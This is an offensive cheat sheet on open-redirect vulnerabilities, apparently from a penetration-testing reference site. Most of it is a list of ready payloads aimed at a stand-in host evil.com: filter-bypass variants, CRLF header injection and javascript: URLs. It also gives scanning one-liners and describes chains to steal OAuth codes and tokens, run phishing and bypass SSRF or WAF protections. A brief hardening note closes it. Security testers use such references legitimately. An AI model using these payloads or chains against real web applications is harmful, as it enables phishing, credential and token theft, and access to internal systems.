← All cheat sheets

OPEN-REDIRECT

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

An open redirect sends users to an attacker URL via a trusted domain. Low sev
alone, but powerful chained (phishing, OAuth token theft, SSRF/WAF bypass, SSO).
Authorized testing only.

FIND THE PARAMETERS#

Common names:
  url= next= dest= destination= redirect= redirect_uri= redir= return=
  returnTo= returnUrl= continue= goto= out= view= to= image_url= callback=
Also path-based: /redirect/https://evil.com , Location set from Referer/Host.

PAYLOADS / FILTER BYPASS#

Baseline:           ?next=https://evil.com
Scheme-relative:    ?next=//evil.com        ///evil.com      /%2f/evil.com
Backslash tricks:   ?next=https:/\evil.com  https:\\evil.com  /\/\evil.com
Whitelist bypass:   ?next=https://target.com@evil.com        (userinfo)
                    ?next=https://evil.com#target.com
                    ?next=https://evil.com?target.com
                    ?next=https://target.com.evil.com         (suffix)
                    ?next=https://evil.com/target.com          (path)
Encoding:           %2f%2fevil.com   %68ttps://evil.com   double-encode
CRLF chain:         ?next=%0d%0aLocation:%20https://evil.com  (header injection)
data:/javascript:   ?next=javascript:alert(document.domain)   (DOM-based only)

DOM-BASED#

Sinks: location = ..., location.href/assign/replace(...), window.open(...).
Source often location.hash/search. Payload stays client-side:
  #https://evil.com   or   ?url=javascript:...

HIGH-IMPACT CHAINS#

- OAuth/SSO: redirect_uri open redirect -> steal auth code/token.
- Phishing: https://trusted.com/redir?url=https://evil-login.
- SSRF/WAF bypass: server-side fetch follows the redirect to internal host.
- Cookie/CSP bypass via trusted-origin hop.

TOOLING#

Burp + Intruder with an open-redirect payload list (seclists).
Automation: oralyzer, OpenRedireX, or nuclei open-redirect templates:
  nuclei -t http/exposures -tags redirect -l urls.txt
  cat urls.txt | gf redirect | qsreplace 'https://evil.com' | httpx -silent -location

HARDENING (blue-team note)#

Use server-side allowlists of relative paths/known hosts, avoid taking full URLs
from user input, and if you must, validate scheme+host against an exact allowlist.